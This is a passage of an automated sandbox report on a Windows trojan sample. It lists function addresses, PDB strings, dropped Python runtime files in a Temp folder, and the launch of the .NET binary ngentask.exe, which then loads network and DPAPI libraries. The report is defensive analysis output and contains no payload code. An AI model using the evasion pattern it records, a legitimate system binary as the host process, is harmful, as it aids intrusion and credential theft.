    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004092703_2_00409270
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004292C03_2_004292C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004012D53_2_004012D5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004392F03_2_004392F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004423503_2_00442350
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0043A3003_2_0043A300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004413223_2_00441322
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004013283_2_00401328
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042F3393_2_0042F339
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004263EF3_2_004263EF
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004054703_2_00405470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004124A93_2_004124A9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004074B03_2_004074B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004215003_2_00421500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040A5D03_2_0040A5D0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040B6403_2_0040B640
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004226F03_2_004226F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004306983_2_00430698
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0043A6B03_2_0043A6B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0041F8603_2_0041F860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004288073_2_00428807
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0041683E3_2_0041683E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004038E03_2_004038E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004088903_2_00408890
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042B8A03_2_0042B8A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004449303_2_00444930
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042C9C03_2_0042C9C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_004379F93_2_004379F9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042AA653_2_0042AA65
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042FA6E3_2_0042FA6E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00426A123_2_00426A12
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00441A903_2_00441A90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00427B133_2_00427B13
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040AB203_2_0040AB20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042EBC13_2_0042EBC1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0041DBCE3_2_0041DBCE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00432BD03_2_00432BD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00420C103_2_00420C10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00430C1E3_2_00430C1E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042CC8A3_2_0042CC8A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00426D483_2_00426D48
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00425D503_2_00425D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00426D603_2_00426D60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040CDD03_2_0040CDD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00422D803_2_00422D80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00421D903_2_00421D90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00433D953_2_00433D95
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0040DE203_2_0040DE20
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00432E303_2_00432E30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00407EF03_2_00407EF0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042AE823_2_0042AE82
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00441E903_2_00441E90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00429F403_2_00429F40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00426F503_2_00426F50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00437F7A3_2_00437F7A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_0042BF7F3_2_0042BF7F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: String function: 0040CBE0 appears 75 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: String function: 0041CB50 appears 172 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: String function: 00F687DB appears 58 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: String function: 00F59710 appears 44 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: String function: 00F52290 appears 194 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: String function: 00F5A140 appears 102 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: String function: 00F52340 appears 86 times
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1495979955.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/21@11/2
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F565B0 GetLastError,FormatMessageW,0_2_00F565B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00439BF0 CoCreateInstance,CoCreateInstance,3_2_00439BF0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242Jump to behavior
    Source: ceFgl3jkkk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ceFgl3jkkk.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile read: C:\Users\user\Desktop\ceFgl3jkkk.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: python3.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: libffi-7.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: libcrypto-1_1.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
    Source: ceFgl3jkkk.exeStatic file information: File size 7166290 > 1048576
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: ceFgl3jkkk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ceFgl3jkkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: _ssl.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _queue.pyd.0.dr
    Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.0.dr
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:55:02 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\python39.pdb source: python39.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _asyncio.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
    Source: ceFgl3jkkk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: ceFgl3jkkk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: ceFgl3jkkk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: ceFgl3jkkk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: ceFgl3jkkk.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
    Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00449B66 push ds; iretd 3_2_00449B83
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00416BE0 pushad ; mov dword ptr [esp], eax3_2_00416BEA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00449C02 push F38BE726h; iretd 3_2_00449C16

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\VCRUNTIME140.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\libcrypto-1_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\libffi-7.dllJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F55270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F55270
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pydJump to dropped file
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dllJump to dropped file
